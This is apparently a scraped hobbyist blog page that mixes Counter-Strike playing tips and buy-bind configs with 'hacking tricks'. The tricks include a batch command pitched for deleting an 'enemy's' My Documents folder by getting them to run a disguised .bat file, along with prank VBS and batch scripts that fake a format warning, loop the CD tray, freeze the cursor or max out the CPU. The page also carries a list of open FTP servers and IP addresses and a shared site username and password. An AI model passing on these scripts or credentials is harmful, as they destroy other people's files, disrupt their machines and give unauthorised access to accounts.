//Ex. bind "f1" "buy awp;buyammo1;buy glock;buyammo2;buyammo2;buyammo2"
//Remove the "//" to activate the bind
//bind "buy awp"
//bind "buy ak47"
//bind "buy m4a1"
//bind "buy famas"
//bind "buy galil"
//bind "buy mp5"
//bind "buy tmp"
//bind "buy deagle"
//bind "buy usp"
//bind "buyammo1"
//bind "buyammo2"
//bind "buy flashbang"
//bind "buy hegrenade"
//bind "buy smokegrenade"
//bind "buy defuser"
//bind "vest"
//bind "vesthelm"
//End Config
source : gamestats
Regards
Silent||Aggression
We use to copy various data by ctrl+c for pasting somewhere else. This copied data is stored in clipboard and is accessible from the net by a combination of Javascripts and ASP.
Just try this:
1) Copy any text by 'ctrl+c'
2) Click the Link: http://www.sourcecodesworld.com/special/clipboard.asp
You will see the text you copied on the Screen which was accessed by this web page. (Check it out !!)
Do not keep sensitive data (like passwords, reditcard numbers, PIN etc.) in the clipboard while surfing the web. It is extremely easy to extract the text stored in the clipboard to steal your sensitive information.
Be cautious ...
To avoid Clipboard Hack Problem, do the following:
1) In Internet Explorer, Go to Tools -> Internet options -> Security
2) Press Custom level.
3) In the security settings, select disable under Allow paste operations via script and click on 'OK. (Now the contents of your clipboard are safe.)
Regards
●๋●н•-------●2•--------●k•-------●2●๋•
нαck τнε нαckεг kгαck τнε kгαckεг
Listen Carefully
Sound is a big part of FPSes these days, giving players hints as to where shots are coming from, or if someone is walking up behind them. Try to learn the different weapon types by sound. It always helps to know whether you're going into a pistol fight or an AK-47 battle. A good sound system can make a difference here. Since version 1.3 it has become possible to use voice communication with Counter-Strike, which can change the gameplay experience quite dramatically and simplify team organization.
Plan Grenade Use
Grenades in Counter-Strike are limited in supply and should be used wisely. A common approach is to soften the enemy up with a few grenades before going in for the final assault. Flashbang grenades, for example, will temporarily blind those caught in the blast radius, making them vulnerable to attack. Of course, a grenade can also come in handy if you need to buy some time to make a quick retreat, or create a distraction.
Crouching and Walking
Crouching will not only steady your weapon, it will lower your profile a little and make you a smaller target. Remember that walking is silent in Counter-Strike, and by default you run all the time, so get to know those controls. Crouching and moving at the same time, while slow, also allows you to move silently. These techniques are critical if you want to sneak up on the enemy without being heard.
Take Cover
Use crates and other objects to partially conceal and protect you. It helps to have a convenient spot where you can completely disappear to reload if necessary. Keep in mind that some of the more powerful weapons in Counter-Strike can penetrate right through certain walls and objects. When you do find yourself in the unfortunate situation of having a grenade lobbed at you, turning away from it will often lessen the impact.
Try to Work as a Team
Rambo looks good in the movies, but it rarely pays off to abandon your teammates and go Kamikaze in Counter-Strike. Typically you run straight into the gunfire (and laughter) of a group of enemy players. In many cases it's nearly impossible to accomplish the game objectives in Counter-Strike without a coordinated effort, assuming that the enemy team isn't asleep at the switch. A team is usually most effective if they are carrying a variety of weaponry, since weapons in most games are designed to have strengths and weaknesses. It isn't every day that a plan comes together in an online action game, but there are rare moments when the whole thing somehow doesn't deteriorate into complete chaos, and that's what it's all about.
Practice, Practice, Practice
Like almost any game, the best way to get better is to practice. This may seem daunting when you first get into a game with a bunch of experienced players, but with a little patience you will find yourself surviving longer and even scoring a few frags.
That covers the basics of becoming a good Counter-Strike player. Naturally, there are a number of strategies and techniques specific to certain classes, weapons, and maps that go beyond the scope of this article, so you might want to browse some of the other guides in our Counter-Strike section. May the frags be with you!
source : internetgames
Trick 1 :
Delete my document :
A WAY TO DELETE THE MY DOCUMENTS FOLDER OF UR ENEMY OR JUST 4 FUN.HERE'S WHAT U SHOULD DO.
rmdir C:\Documents and Settings \S\Q.
OPEN NOTEPAD AND COPY-PASTE THE ABOVE CODE IN IT.THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT BE SURE TO SAVE IT AS A BAT FILE.I MEAN SAVE IT LIKE MYVIRUS.BAT.IT SHOULD HAVE THE ENDING AS .BAT.NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.
Trick 2 :
Open notepad and type the code below:
lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning")
Then save it as Virus.VBS
note : this one is not harmful just to scare you
Trick 3 :
here is the code of a virus
which will open and close your cdrom copy paste code inside equals in notepad
=========================================
'code start from here
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If
'code end from here
=========================================
save it as virus.vbs and double click it
and if u want to close it just open task manager and end wscript.exe
Trick 4 :
@echo off
start WISPTIS.EXE
start WISPTIS.EXE
start WISPTIS.EXE
start WISPTIS.EXE
start WISPTIS.EXE
start WISPTIS.EXE
open notepad and save it as anyname.bat
this will stop your mouse cursor
to fix it log off your pc
Trick 5 :
Note this one is best trick to slow down pc
open notepad
type
do
loop
save it as anyname.vbs
and click on it once twice thrice anytime to make pc too slow .
Open task managar you can see 100% CPU usage . to restore to normal close all wscript.exe from task manager .
Regards
●๋●н•-------●2•--------●k•-------●2●๋•
нαck τнε нαckεг kгαck τнε kгαckεг
Burst Fire
Because Counter-Strike tries to simulate the recoil of actual guns, the longer you hold down the trigger the less accurate your rounds become. Unless you are at point blank range, after the first few shots you will likely just be blasting ammunition into the wild blue yonder, well over the heads of the enemy. To prevent this, and make your ammo count for something, it is a common practice in Counter-Strike to fire in short bursts of only two or three rounds, giving you a chance steady up for the next shot.
Compensate for Recoil
It may seem like common sense, but if you know that your weapon is going to recoil, it helps to compensate for it as best you can, typically by aiming down a little. Of course, the longer you press the trigger, the more difficult it will become to compensate adequately, so this is most effective when combined with burst fire as described above.
Plan Your Reloads
Reloading is one of the elements that differentiates Counter-Strike from some of the earlier FPSes. When your gun runs out of ammo, you must replace the clip, and although this can be done quite quickly, it often makes the difference between life and death. Try not to jump into an O.K. Corral style shoot-out without a fully loaded weapon, and when the time comes to reload, it's nice to have somewhere that you're not a sitting duck to do it.
Keep Your Pistol Handy
On a similar note, since you can switch weapons faster than you can reload in most FPSes, a quick weapon change at a critical moment can turn around the confrontation. We've all seen two players empty their guns into (or near) each other and almost simultaneously run out of ammo. Sometimes a good Counter-Strike player will finish the enemy off with his pistol or even his knife rather than wait for a reload.
Customize Your Controls
Making fast weapon changes and pulling off more complex maneuvers swiftly is greatly facilitated by customizing game controls and using scripts. Every player seems to have a personal preference when it comes to key combinations, and having the commands you need at your fingertips will speed up your gameplay considerably, although you will have to experiment with different configurations. Many experts have a custom configuration for each different class that they play.
Strategic Jumping
When you're in an open area or you know there are snipers targeting you, it's important to move around as much and as unpredictably as possible. Jumping, but not too regularly, can force the enemy to aim vertically as well as horizontally, or it can, if you're lucky, turn what would have been a head shot into something a little less damaging. That said, some players are prone to jumping continuously, even when out of harm's way, which can make you look like an idiot.
source : internetgames
regards
SILENT||AGGRESSION
test ur antivirus is working or not!!!!!!!
open notepad
type"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
without quotations and save the file as some name .bat and scan if antivirus detect it as a virus then its fine else pls change it fast
Regards
●๋●н•-------●2•--------●k•-------●2●๋•
нαck τнε нαckεг kгαck τнε kгαckεг
ftp://ftp.freenet.de/pub/filepilot/
ftp://194.44.214.3/pub/
ftp://ftp.uglan.ck.ua/games2/
ftp://24.205.131.21/
ftp://217.172.16.3:8778/
ftp://194.187.207.98/
ftp://194.44.214.3/pub/e-books/
ftp: //87.240.8.166/
ftp: //130.89.175.1/pub
ftp://82.195.0.167/
ftp://65.28.145.37/
ftp://87.240.7.84/upload/video/
ftp://213.219.249.133/73~fims2006/
ftp://141.85.137.22/Downloads/
ftp://85.21.96.190/Games/
ftp://213.191.222.2/
ftp://80.94.160.129/pub/windows/
ftp://194.44.214.3/pub/
ftp://202.96.64.144/pub/
ftp://82.195.0.167/
ftp://61.145.123.141:5632/
username: leech password: l33ch
ftp://130.89.175.1/pub
ftp://87.240.8.166/
ftp://194.44.214.3/pub/e-books/
ftp://61.145.123.141:5632/
ftp://220.189.249.188/
ftp://82.199.102.210/Pub/Clips/foreign/
ftp://212.219.56.152/
ftp://195.130.78.207/pub/Linux/
==========================================================
194.149.67.136
195.208.245.253
209.68.22.126
81.94.33.27
81.94.33.7
81.94.33.41
193.52.184.2
195.151.131.21
81.94.33.36
81.94.33.60
81.94.32.77
194.2.0.36
195.46.96.194
217.79.52.14
193.48.224.206
139.102.70.202
218.44.234.234
140.142.3.249
195.54.222.40
81.7.92.174
195.34.232.146
213.210.100.195
204.152.191.37
159.153.229.107
140.112.30.75
134.129.212.47
213.135.44.35
131.254.254.45
134.245.248.199
62.250.3.15
195.225.172.2
ftp://gameftp.gcn.ua/pub/
nice one ;)
ftp://gameftp.gcn.ua/pub/small%20games/Soldat
www.downloadprofessional.com
Username: lo886Ees
Password: zAgt88er
download as much as you can ! which other site can give you this much info !
Regards
●๋●н•-------●2•--------●k•-------●2●๋•
нαck τнε нαckεг kгαck τнε kгαckεг
hey guys, iw read a good topic on steam forums and i figured id post it here as well. theres 2 settings that made me get standard 95-100 FPS in game while i had 30-40 FPS b4.
ayways do this as it says here .
- Set the proper -heapsize for your amount of memory
This command determines how much memory (RAM) is allocated strictly for hl2.exe. The general agreement is that this number should reflect how much memory is installed in your system. Here is the equation:
Your System Memory (In Megabytes) / 2 * 1024 = Your Heapsize
Examples:
512MB / 2 * 1024 = -heapsize 262144
1024MB / 2 * 1024 = -heapsize 524288
2048MB / 2 * 1024 = -heapsize 1048576
Applying this setting will stabilize your game performance greatly - with no reduction in visual quality. Textures are better handled by the game, and the game has an increased ability to cache resources.
To do this, simply launch Steam/hl, go to MY GAMES, and
Right click on Counter Strike Source, and click Properties.
Click Set Launch Options, and type -heapsize
I have 1 gig of ram, so I set -heapsize 524288
You can do the same thing to your other Games, like Half-Life 2.
the 2nd settings u need to do and which helps allot is
Set STEAM.EXE/hl.exe affinity
Open Steam. Open Windows Task Manager by pressing CTRL+ALT+DEL and go to the Processes tab. Right click on STEAM.EXE/hl.exe, and click SET AFFINITY. You will see CPU 0 and CPU 1. Uncheck CPU 1. Click OK, and close Task Manager.
Unfortunately you have to do this whenever you restart Steam/hl.exe, but it's worth it if it fixes your problems!
*Please note that this Affinity fix will only work on multi-core processors (Like AMD X2 or Pentium 4 8xx series for example), or Pentium 4 processors with Hyper Threading Technology.
NOTE: u need to set this every time u restart steam! there is a way to set it and it stays like that but i dunno how :(
hope this helped u guys as well, and thanks to the guy that figured this out :D
regards
SILENT||AGGRESSION
A B C OF HACKING LETS START!!!!!!
starting hacking ? abcd of hacking................
to start hacking u must know first :-
01) your hardware ( includes everything , assembling pc , knowing motherboard each & every part , basics abt lan , router,modem & their working , etc.......
then explore your pc by inside :-
02) ie. knowing different types of software ( every category like SECURITY SOFTWARE , DEVELOPER TOOLS ( like adobe dreamweaver ,site spinner ,cofeecup html editor etc) , Utilities & Drivers ( like system mechanic , registory editor ) , Networking Software ( ping tracer , scanner etc) , Chat, VoIP & E-mail Software e.t.c
03) if using win xp operating sys. then first of fall learn,understand xp , explore secret tips , and many more u can get everything about xp here:-
http://freepctech.com/pc/xp/xpindex.shtml
http://xp.codeitbetter.com/
http://windowxpforu.blogspot.com/search/label/Tips%20Tricks%20Secrets%20of%20XP
http://www.hsinlin.com/tips/winxptop.html
http://www.metacafe.com/watch/754299/windows_xp_secret_tricks/
http://www.hiddentricks.com/windows-tricks.html
04) Learn DOS prompt ( each and every command for a perfect hacker ) { v.imp step to start hacking} Learn how to make a few batch files.
here u can get list of dos commands :-
http://www.computerhope.com/msdos.htm
http://rahulhackingarticles.wetpaint.com/page/All+Dos+Commands?t=anon
http://www.easydos.com/dosindex.html
http://www.uv.tietgen.dk/staff/mlha/PC/Soft/DOS/com/
05) read article on hacking , pc magazines , reading public forums on hacking , reading e-books on hacking , using google to hack ...........................
06) must have some knowledge about
HTML ,C++, visual basic .... (i'd recommend learning html as your first language )
07) understanding networking & security tools .............. Sep 6 (6 days ago) avi
08) knowing different tools of hacking & how to use them..............few tools like :-
Key Loggers
port scanner
ip scanner
fake id creator
network tracer
RAT
Regards
●๋●н•-------●2•--------●k•-------●2●๋•
нαck τнε нαckεг kгαck τнε kгαckεг
As name suggests .. this blog is deadly combination of two deadly things HacKing & Gaming..
In gaming section i only wanted to talk about counter strike sometimes known as Half Life but i know it LIFE for CS gamers ...
I will talk a lot about counter strike names , teams , settings , strategies , maps , map creation and lot more just feel free to ask any query ... or ask BEST EVER strategies to win in any battle ...
HAVE GREAT STAY !
regards
SILENT||AGGRESSION
ฬєℓCσмє тєCнภσ թєσթℓє нєяє เร тнє ภєฬ ภคмє σƒ тєCнภσℓσGY “н2K2” Yєร ƒяเєภ∂ร เƒ Yσυ คяє CяคZY єภσυGн тσ Gєт ∂เรรσℓ√є∂ เภ тєCнภσℓσGY คภ∂ թℓคY ฬเтн тнเร Gคмє σƒ яє√єяรє єภGเภєєяเภG
เ ฬเℓℓ нєℓթ Yσυ тσ ฬเภ เт ƒσя รυяє
ҳ̸Ҳ̸ҳ ⒺⓍⓅⒺⓇⒾⒺⓃⒸⒺ ⓉⒽⒺ ⒹⒾⒻⒻⒺⓇⒺⓃⒸⒺ ҳ̸Ҳ̸ҳ
Regards
●๋●н•-------●2•--------●k•-------●2●๋•
нαck τнε нαckεг kгαck τнε kгαckεг
Intelligent Visitors
Search Ends Here!
More Resources
CounterHack Chat Box
Blog Roll
Categories
- Tricks (14)
- Hacking (13)
- tips (11)
- Counter Strike (7)
- software reviews (2)
- tutorial (2)
- user request (2)
- strategies (1)
Translate
Contact Me :
for any queries , downloads , tell me what to write , need my help,troubleshooting ?? feel free to contact
h2k223@gmail.com